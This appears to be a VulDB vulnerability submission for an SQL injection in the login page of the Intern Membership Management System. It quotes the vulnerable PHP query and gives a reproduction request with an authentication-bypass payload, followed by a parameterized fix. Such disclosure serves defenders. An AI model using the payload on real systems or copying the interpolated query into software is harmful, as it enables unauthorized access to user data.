| Title | code-projects Intern Membership Management System published July 27, 2025 SQL Injection |
|---|
| Description | Summary
The login endpoint student_login.php fails to sanitize user-supplied input in the user_name and password parameters.
Root Cause
The application directly interpolates the $_POST['user_name'] and $_POST['password'] values into an SQL query string:
```php
$query = mysqli_query($dbconn, "SELECT * FROM registered_users WHERE user_name='$username' and password='$password'");
```
No escaping or parameterization is applied, allowing arbitrary SQL code injection.
Reproduction
Send a POST request to student_login.php with the following body:
```http
POST /intern/student_login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded

user_name=' OR '1'='1&password=anything&submit=Login
```
The resulting query becomes:
```sql
SELECT * FROM registered_users WHERE user_name='' OR '1'='1' AND password='anything'
```
Since '1'='1' is always true, the login bypasses authentication and grants unauthorized access.
Impact
An unauthenticated remote attacker can bypass login checks, potentially gaining access to student information or administrative functions. If the same pattern exists elsewhere, further data exposure or system compromise may be possible. |
|---|
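
A parameterized version of the query quoted under Root Cause, as an added example that is not code from the project or from the original report. The helper name `authenticate_student`, the length limits and the session key are assumptions; `$dbconn`, the table and the column names come from the quoted query.

```php
<?php
// Added example (not the project's code): the login lookup with bound parameters.
// authenticate_student() is a hypothetical helper name.
declare(strict_types=1);

mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT); // throw on DB errors

function authenticate_student(mysqli $dbconn, mixed $username, mixed $password): ?array
{
    // Reject non-string input (e.g. user_name[]=x) and oversized values up front.
    // The 64/256 byte limits are assumed values, not taken from the application.
    if (!is_string($username) || !is_string($password)
        || $username === '' || strlen($username) > 64 || strlen($password) > 256) {
        return null;
    }

    // Placeholders keep the statement text fixed. The values travel separately,
    // so quotes inside them cannot alter the structure of the WHERE clause.
    // The comparison semantics of the original query are left unchanged.
    $stmt = $dbconn->prepare(
        'SELECT * FROM registered_users WHERE user_name = ? AND password = ?'
    );
    $stmt->bind_param('ss', $username, $password);
    $stmt->execute();
    $result = $stmt->get_result();

    // Exactly one matching row is a valid login; anything else is refused.
    $row = ($result->num_rows === 1) ? $result->fetch_assoc() : null;
    $stmt->close();
    return $row;
}

// Usage inside student_login.php, where $dbconn is the existing connection handle.
$user = authenticate_student($dbconn, $_POST['user_name'] ?? null, $_POST['password'] ?? null);
if ($user === null) {
    http_response_code(401);
    exit('Invalid credentials');
}
session_start();
session_regenerate_id(true);                 // fresh session id after login
$_SESSION['user_name'] = $user['user_name']; // session key name is an assumption
```

With the statement prepared this way, the `user_name` value from the Reproduction request is compared as a literal user name instead of being parsed as SQL.
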
| Source | ⚠️ https://github.com/shenxianyuguitian/intern-mms-vuln/blob/main/README.md |
|---|
| User | xuanyuesanshi (UID 88126) |
|---|
| Submission | 07/29/2025 10:06 (9 months ago) |
|---|
| Moderation | 07/30/2025 10:38 (1 day later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 318291 [code-projects Intern Membership Management System 1.0 /student_login.php user_name/password sql injection] |
|---|
| Points | 20 |
|---|